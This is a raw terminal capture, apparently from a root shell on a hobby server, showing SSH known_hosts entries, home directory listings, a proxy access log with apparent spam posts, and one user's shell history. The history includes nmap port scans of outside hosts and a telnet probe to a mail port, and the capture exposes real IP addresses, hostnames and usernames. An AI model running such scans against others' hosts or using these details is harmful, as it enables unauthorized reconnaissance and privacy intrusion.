9q+vSI0Oz3s7KXoD4LbCqzSca9jbKSdk1BlH8Jz+fOG5+XUcOYmcbaSYU73PqLt+gJ+Ye XspnBjCCqA7/sD6KfgWAYQh8KiJYjciUJ1Kc5tw8MISW0v3Sxphp8QlcuAk1M8zKSP8uZ Z4Dsiw/r75SjFCTNKOCr8dzcKwL3tyMRtPGH0sRDmLQI4ndmBEb1gldknSUZOilDVlYJK K7phyzopzd+GXSXlIhWnhFc8w== localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxgnjMIPg1s3fGZPAtyFjtcDUGX6my1X7YFYnlv1y9 PL78if+wsBgT6SY9WWtqeu1owAjCMeMHPfU3GMV9Q5dGD74CSENGpfzMr8vrFc+D8yqj9 vS080AFByxp/NN9AFYFUn4c7rYfdnPzBt/ur5f51KzlVyhV++TcSBX4rToqxM= 10.48.100.81 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwDm7jfhCI0rtwj5/Wpv3AvHN81RKb3lFALFhtl80i 1KB2pMlBJNRuAkgvkPFpleyKEHol6tYuMSMCn6qiV4rKJ1wcKoTyVlYNl296381PYdYNX SlA58SD4ErWx5Ttz45iAJL8I/2ToxGOX0k1abAIEPiaCKIsf1k7/23jBkWjlE= www.zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE= 81.93.5.180 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4OrbUK 7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2NsbIez9+bB 1ojKy5BoNLsocoQbvzgVbxOXHvRwcWTGK9H7Yq8ZJPLC4ezsOpAcyTeBHEeuM= 66.168.220.212 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5 LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+ BE810BNmXi0QA6WlYUOpMJj9Q== irc.liveits.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nFkhEnqjRxLMWLxfkDdxeKDMs5or hRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtTAWxe5ZeCDKL4phDbubxDIJvFKcTfN i+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZk8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5 LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHqMyej98cRVvY/iATI5SrFRCfWNkC7gH/oFxX M/bKB94H7TZ4W6wtfdjmkBrYxojDbUKKEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+ BE810BNmXi0QA6WlYUOpMJj9Q== server1.zloche.net,65.92.158.240 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyNZzwK45 zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7GFLrrrlBYzX8 uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdSXaasNJMb4U= server4.zloche.net,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ 4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE= zloche.zapto.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAt9hfTe460T8l2oPkq3WD7fnie6fzIWH9ep1HX8NVS zLFT+fUlLzgpWUU+g1HycYAV4S5nSfG3FSsPfeEETXzBaaYeAU87qn3vtjuRU7Fp5Tv6m PnFiOJuDwJ4wG3yA8+oyRzTMThfhnGDP+H90eacVPjxoTN0lQiM3VvmhR4j9rTfaVkx9B DmUz2sorEMAHcpajK3h2dB124tiNR/IggGvXmwPUJym10O1QZKVrjCkdbacz9zV4ROmc5 c/hucKGwZH9mOW+Zo1GB2OP7LHMPPCmO7qymvG67eOsyc/QmBQcsqBSPYmC1xNms9c6cb nZeUvjYFY0rfQql39oytXeJ7w== server4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx05mZ 4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS3oQW/nPF C8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6bIiuE= server3 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGV SNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlq uOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE= server4:/home# ls -alh total 673M d-wx--s--x 17 root root 4.0K May 6 03:51 . drwxr-xr-x 21 root root 4.0K Feb 13 02:25 .. -rw-r----- 1 proxy proxy 673M May 6 03:51 access.log drwxrwxrwx 8 chat chat 4.0K Mar 29 13:36 chat drwxr-xr-x 3 djdd djdd 4.0K Feb 1 04:28 djdd drwxr-sr-x 2 root nogroup 4.0K Jan 30 00:11 ftp drwxr-xr-x 2 gnomex gnomex 4.0K Apr 13 22:21 gnomex drwxr-xr-x 10 gumbie gumbie 4.0K May 30 04:45 gumbie drwxrwxrwx 12 hlds hlds 8.0K Mar 3 19:31 hlds drwxr-xr-x 6 ircd ircd 4.0K Feb 7 05:18 ircd drwx------ 2 root root 16K Jan 28 14:14 lost+found drwxr-xr-x 7 madstorm madstorm 4.0K Apr 1 09:30 madstorm drwxr-xr-x 8 misterinfo misterinfo 4.0K Feb 16 22:54 misterinfo drwx------ 5 prototype prototype 4.0K Jun 3 20:01 prototype drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 stax drwxrwxrwx 5 www www 4.0K Apr 27 18:28 www drwxrwxrwx 9 xposedbones xposedbones 4.0K Mar 31 01:07 xposedbones drwxr-xr-x 6 yumiro yumiro 4.0K Jun 7 18:47 yumiro server4:/home# head access.log 1178339246.919 74 58.211.123.102 TCP_MISS/302 524 GET http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 - 1178339246.955 34 58.211.123.102 TCP_MISS/302 522 GET http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 - 1178339246.969 1314 72.36.179.122 TCP_MISS/200 14794 GET http://www.gzlvc.com/mfkiqpl/guestbook.asp - DIRECT/69.25.142.5 text/html 1178339246.969 565 72.232.14.66 TCP_MISS/302 503 POST http://mino.s35.xrea.com/mino/cbbs.cgi - DIRECT/219.163.200.87 text/html 1178339247.011 1161 66.232.123.181 TCP_MISS/200 7229 POST http://hamohamo-web.hp.infoseek.co.jp/cgi-bin/light62/./light.cgi - DIRECT/210.148.115.140 text/html 1178339247.051 2061 72.232.14.66 TCP_MISS/200 494 POST http://kevadlilleke.pri.ee/wp-comments-post.php - DIRECT/194.106.101.165 text/html 1178339247.088 25 58.211.123.102 TCP_MISS/302 519 GET http://ad.iconadserver.com/imp? - DIRECT/208.67.68.11 - 1178339247.125 1970 72.232.14.66 TCP_MISS/302 511 POST http://www.stratabase.com/resync/phorum/post.php - DIRECT/207.81.157.129 text/html 1178339247.132 40 58.211.123.98 TCP_MISS/200 1631 GET http://ad.yieldmanager.com/imp? - DIRECT/208.67.68.11 application/x-javascript 1178339247.147 1334 58.211.123.102 TCP_HIT/200 12680 GET http://content.iconadserver.com/rmtag3.js - NONE/- application/x-javascript server4:/home# cd stax server4:/home/stax# ls -alh total 793M -rw-r-xr-- 1 stax stax 5 May 23 19:01 #TMPZONLINE# -rwxrwxrwx 1 stax stax 3 Apr 18 23:59 #msnbot# drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 . d-wx--s--x 17 root root 4.0K May 6 03:51 .. -rw-r--r-- 1 stax stax 266 Jan 28 17:48 .alias -rw------- 1 stax stax 8.5K Jun 9 01:45 .bash_history -rw-r--r-- 1 stax stax 567 Jan 28 17:48 .bash_profile -rw-r--r-- 1 stax stax 1.8K Jan 28 17:48 .bashrc -rw-r--r-- 1 stax stax 375 Jan 28 17:48 .cshrc drwx------ 2 root root 4.0K Apr 26 18:04 .elinks drwxr-xr-x 3 root root 4.0K Jan 28 21:41 .emacs.d drwx------ 2 root root 4.0K Jan 28 18:18 .links -rw------- 1 root root 0 Jan 28 23:12 .mysql_history -rw------- 1 root root 1.0K Feb 1 04:23 .rnd drwx------ 2 stax stax 4.0K Apr 4 18:43 .ssh drwxr-x--- 2 stax stax 4.0K Jan 28 21:25 .steam -rwxrwxrwx 1 stax stax 25K Mar 27 05:44 Charlie Gordon est un simple d.doc -rwxrwxrwx 1 stax stax 25K Mar 29 18:28 Charlie_Gordon_est_un_simple_d.doc drwxr-xr-x 2 stax stax 4.0K May 6 04:44 DEVLulZ -rw-r--r-- 1 stax stax 256K Jun 4 18:27 Death_Note_18_anime-master_fr.rar -rw-r--r-- 1 stax stax 165M Apr 28 10:08 Death_Note_28_anime-master_fr.rar -rw-r--r-- 1 stax stax 165M May 5 11:42 Death_Note_29_anime-master_fr.rar -rw-r--r-- 1 stax stax 164M May 13 19:08 Death_Note_30_anime-master_fr.rar -rw-r--r-- 1 stax stax 8.8M Jun 4 18:28 Death_Note_31_anime-master_fr.rar -rw-r--r-- 1 stax stax 164M May 22 18:03 Death_Note_31_anime-master_fr.rar.1 -rw-r--r-- 1 stax stax 108M Apr 29 21:34 Flash8-en.exe -rwxrwxrwx 1 stax stax 2.1M Apr 5 23:44 Infomercial.mov drwxr-xr-x 2 stax stax 4.0K May 23 19:02 TMPZONLINE -rw-r--r-- 1 stax stax 19K May 20 10:12 WebServer.php drwxrwxrwx 12 hlds hlds 4.0K Jun 1 2006 amxmodx_ -rwxrwxrwx 1 root root 30K Jan 30 08:33 asdasd.txt -rw-r--r-- 1 stax stax 5.0K Jun 6 18:45 b0t.php -rw-r--r-- 1 stax stax 5.0K Jun 6 18:43 b0t.php~ drwxr-xr-x 2 stax stax 4.0K May 30 23:24 bidvertads -rwxrwxrwx 1 stax stax 83 Feb 22 01:01 cmd.for.dl.txt drwxr-xr-x 2 stax stax 20K Apr 26 00:36 comics drwxr-xr-x 2 stax stax 4.0K Apr 25 23:45 ctrlaltdel drwxr-xr-x 6 stax stax 4.0K Jun 8 03:42 files drwxrwxrwx 3 root root 4.0K Feb 12 01:35 firefox-2.0 -rw-r--r-- 1 stax stax 728 May 20 05:51 http.php -rw-r--r-- 1 stax stax 728 May 20 05:50 http.php~ drwxrwxrwx 3 stax stax 4.0K Apr 23 04:47 irc-server -rwxrwxrwx 1 stax stax 3.7K Feb 14 05:24 meh.sh -rwxrwxrwx 1 root root 9.3K Jan 30 00:38 meh.txt -rwxrwxrwx 1 root root 27K Jan 30 00:38 meh.txt2 drwxrwxrwx 4 stax stax 4.0K Jun 8 16:53 msnbot -rw------- 1 stax stax 270K Jun 4 18:33 nohup.out -rw-r--r-- 1 stax stax 167 May 2 18:21 notimeout.php -rw-r--r-- 1 stax stax 156 May 2 18:15 notimeout.php~ -rw-r--r-- 1 stax stax 54 May 16 18:31 omfgjavacourse.txt drwxrwxrwx 2 stax stax 4.0K Mar 28 18:11 projet_francais drwxr-xr-x 2 stax stax 4.0K Apr 28 05:56 public_html -rw-r--r-- 1 stax stax 4.7K Jun 3 22:29 real.bot -rw-r--r-- 1 stax stax 4.7K Jun 3 10:25 real.bot~ -rwxrwxrwx 1 root root 1.9K Apr 29 23:43 richo.py -rw-r--r-- 1 stax stax 0 Jun 6 18:50 say drwxr-xr-x 2 stax stax 4.0K Jun 8 03:56 sessions drwxrwxr-x 2 stax shared 4.0K Apr 28 05:04 shared -rwxrwxrwx 1 stax stax 118K Feb 7 04:49 squid.conf -rw-r--r-- 1 stax stax 143 Jun 6 18:36 talk.php drwxr-xr-x 2 stax stax 320K Jun 7 18:58 vaginite drwxrwxrwx 2 stax stax 4.0K Apr 4 23:42 ventrilo -rwxrwxrwx 1 root root 10M Jan 21 22:15 webmin_1.320_all.deb drwxrwxrwx 6 stax stax 4.0K Feb 19 01:21 webtv -rw-r--r-- 1 stax stax 77 May 14 00:09 wget.txt -rw-r--r-- 1 stax stax 1014 Apr 26 00:33 yay.php -rw-r--r-- 1 stax stax 1014 Apr 26 00:24 yay.php~ -rwxrwxrwx 1 stax stax 5.4M Mar 5 07:09 zonline.tar drwxr-xr-x 2 stax stax 4.0K Jun 8 05:36 zradio-script server4:/home/stax# more .bash_history ssh zloche@server3 ssh server2 ssh zloche@server3 ssh server2 ssh server2 w ssh zloche@server3 ssh zloche@zloche.net ls ssh zloche@zloche.net w ls mkdir bidvertads cd bidvertads/ wget http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,2234 28,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null&e nparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bid vertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF%3 D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26j srand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/ wget "http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223 428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null& enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi --More--(10%) dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF% 3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26 jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/" wget "http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223 428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null& enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF% 3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26 jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/" wget "http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223 428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null& enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF% 3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26 jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/" wget "http://secure.bidvertiser.com/performance/bdv_rd.dbm?enparms=72,154468,223 428,385,984,522,533,548,388,587&REF=www.zloche.net/chat%2F&TREF=1&WIN_NAME=null& enparms2=632,154696,223695,581,632,632,616,1130,970,587,582&jloc=http%3A//bdv.bi dvertiser.com/BidVertiser.dbm%3Fpid%3D44284%26bid%3D154114%26RD%3D3056626%26DIF% 3D1%26REF%3Dwww%252Ezloche%252Enet%252Fchat%252F%26tref%3D1%26win_name%3Dnull%26 jsrand%3D125549%26js1loc%3Dhttp%253A//www.zloche.net/chat/" w cd ~pro --More--(28%) cd ~proxy/ ls namp -sad nmap -sad nmap p 0-9999999 nmap p 0-9999999 localhost nmap -p0-9999999 localhost nmap -p0-65535 localhost cd /www/server4/animes/ ls emacs .htaccess ssh server2 w w w who ssh stax@server2 ssh stax@server3 ssh stax@server3.zloche.net ssh stax@zloche.net w emacs real.bot emacs real.bot --More--(32%) php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot --More--(36%) php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot emacs real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot w w php real.bot emacs real.bot php real.bot emacs real.bot --More--(39%) php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot emacs real.bot php real.bot php real.bot emacs real.bot php real.bot emacs real.bot --More--(43%) php real.bot emacs real.bot php real.bot w ssh zloche@server3 ssh zloche@zloche.net w top -aef top -zef top -bef top -bf top -b ping ks33756.kimsufi.com ping ks33756.kimsufi.com nmap ks33756.kimsufi.com w w w w w w w w --More--(45%) w w ww w w w whois 68.98.115.176 ssh zloche@www.zloche.net w ls cd msnbot/ emacs msnbot.php ls * ls * | ls */* | ls */*/* w ls * | ls */* w ls cd www/ ls ls cd chat__/ ls --More--(47%) w w ssh stax@www.zloche.net w who ls less cmd.for.dl.txt wget http://88.191.14.73/awarefirst/Death%20Note/Death_Note_18_anime-master_fr. rar wget http://88.191.14.73/awarefirst/Death%20Note/Death_Note_31_anime-master_fr. rar nohup wget http://88.191.14.73/awarefirst/Death%20Note/Death_Note_31_anime-mast er_fr.rar & ls cd / ls sudo bash w ssh zloche@zloche.net php real.bot w w php real.bot --More--(52%) w ssh zloche@www.zloche.net write yumiro ls cp real.bot /www/server4/4yumiro.phps w ssh zloche@www.zloche.net cp /home/yumiro/bot.php b0t.php emacs b0t.php emacs b0t.php emacs talk.php php b0t.php & emacs say pgp b0t.php php b0t.php php b0t.php & php talk.php cp talk.php /www/home/yumiro/talk.php cp talk.php /home/yumiro/talk.php cp talk.php /www/server4/talk.phps php talk.php kill 24874 emacs b0t.php --More--(57%) php b0t.php php b0t.php & kill 21145 emacs b0t.php php b0t.php & kill 7829 emacs b0t.php php b0t.php & php talk.php sudo su zloche ssh zloche@www.zloche.net w top -b |grep php top -b |grep php kill 20493 791 top -b |grep php kill 17412 wall wall wall w ssh zloche@www.zloche.net w --More--(60%) write djdd w w w w w w w w w top -b |grep php sudo bash w top ls cd msnbot/ ls emacs msnbot.php top -b killall php nohup php msnbot.php nohup php msnbot.php & w --More--(62%) w less nohup.out du -csh nohup.out w w w w top cd .. mkdir vaginite emacs php.php mv php.php vaginite/ cd vaginite/ php php.php ls php php.php w du -csh ls * |grep 'vaginite' du ls * |grep -n '*' ls * |grep -n '_' ls --More--(64%) ls |grep -n "vaginite" ssh stax@www.zloche.net ssh stax@www.zloche.net ssh stax@www.zloche.net ping www.zloche.net ping www.zloche.net ssh stax@www.zloche.net ssh stax@www.zloche.net ssh stax@www.zloche.net ssh stax@www.zloche.net w w ssh stax@80.248.208.223 ping 80.248.208.223 ssh stax@80.248.208.223 w ssh stax@80.248.208.223 ssh stax@80.248.208.223 ssh stax@80.248.208.223 ssh stax@80.248.208.223 w ssh stax@80.248.208.223 ping www.zloche.net --More--(69%) w w ssh stax@server3 ssh stax@www.zloche.net ping www.zloche.net ping www.zloche.net w who ls w cd files/ ls cd .. ssh stax@server3 ssh stax@www.zloche.net ping www.zloche.net php real.bot php http.php ;s ls php WebServer.php w pimg www.zloche.net --More--(72%) ping www.zloche.net w ping www.zloche.net php WebServer.php php WebServer.php php WebServer.php w w ping www.zloche.net ping www.zloche.net ls cd zradio-script/ ls mv The\ Arcade\ Fire\ -\ Wake\ Up.mp3 song.mp3 emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php php server.php --More--(76%) rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php rm server.php emacs server.php php server.php w w --More--(80%) w w w top ping www.zloche.net w w w ping server3 ping www.zloche.ne ping www.zloche.net w w w cd .. ls cd irc-server/ ls php IRC.php whois 210.75.25.28 whois 210.75.0.0 whois 210.0.0.0 whois 210.75.0.0 --More--(83%) ping 210.75.25.28 nmap 210.75.25.28 nmap -P0 210.75.25.28 w telnet 210.75.25.28 25 cd msnbot/ ls killall php rm nohup.out php msnbot.php php msnbot.php emacs msnbot.php emacs msnbot.php php msnbot.php emacs msnbot.php php msnbot.php emacs msnbot.php w ls cd msnbot/n cd msnbot/ ls emacs msnbot.php --More--(86%) top killall php php msnbot.php emacs msnbot.php php msnbot.php w r mno du -csh nohup.out rm -csh nohup.out rm nohup.out nohup php msnbot.php & less nohup.out w ping www.zloche.net w w w ping www.zloche.net w who ssh stax@irc.rasterized.net w ping www.zloche.net --More--(89%) ssh stax@irc.rasterized.net -p 443 w w w ping www.zloche.net ping www.zloche.net w ping www.zloche.net w who who ping www.zloche.net w ping www.zloche.net ping server4 w netstat sudo bash netstat netstat -n whois 207.46.107.41 netstat -n netstat -n --More--(92%) netstat -n w w w who who netstat -n netstat -n less nohup.out less nohup.out |grep laurent less nohup.out |grep laurent less nohup.out |grep laurent less nohup.out |grep laurent less nohup.out |grep laurent less nohup.out |grep laurent w w less nohup.out |grep laurent netstat -n ping www.zloche.net ping irc.rasterized.net whois 74.69.17.126 netstat -n --More--(96%) netstat -n w ping craplandia.org ping craplandia.org w netstat -n who ssh root@www.zloche.net cd msnbot/ cd admins/ ls emacs n1ck.usr CD .. cd .. nohup php msnbot.php & r, admins/n1ck.usr rm admins/n1ck.usr cd msnbot/ ls less nohup.out w ssh zloche@www.zloche.net ssh zloche@www.zloche.net server4:/home/stax# cd .ssh server4:/home/stax/.ssh# ls -alh total 16K drwx------ 2 stax stax 4.0K Apr 4 18:43 . drwxr-xr-x 25 stax stax 4.0K Jun 8 04:51 .. -rw-r--r-- 1 stax stax 3.9K Jun 8 08:13 known_hosts -rw-r--r-- 1 stax stax 1.3K Feb 7 00:39 known_hosts~ server4:/home/stax/.ssh# cat * server1,65.92.156.62 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== server3,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS ichE= server2.zloche.net,65.94.84.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== 74.14.168.190 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== server2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== server4,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nhXx 05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/qHPS 3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3HbwGj6b IiuE= 70.53.252.108 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== zloche.net ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZ uiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQD ibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaS ichE= 70.55.196.23 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== 70.55.196.105 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtWj3vqOrTzvLAHmMtiPCbMzwa+jYBcJOEVlE/ vKiWfqPWs5qSwV2fJxfofw09ZnZn3vujQmfdPB300tEh4rcqt7hCvqzodn7z9RFzm KBTQcz65EDN86iHI/73gX7PjodHn+xGqx4O3fmJDENJ/7QKV3qCY3N1WB5HW/aTI+ cbDECDrAtScTzC/EuiVLmlAg2uSdCVc/ihOaGM7dEAmNWZnAvsZTGTqqKzpobD83V BNAROR7qcrq4EdXTygEGr/FRQ8XyXtT2+EGwWBOez8+lja+wLTlplhGOEazVa+IrX wVt7eMaSMM/3QKX0ZvZECQRBw2abfTXilT8G2QWLVPpTQ== www.zloche.net ssh-rsa 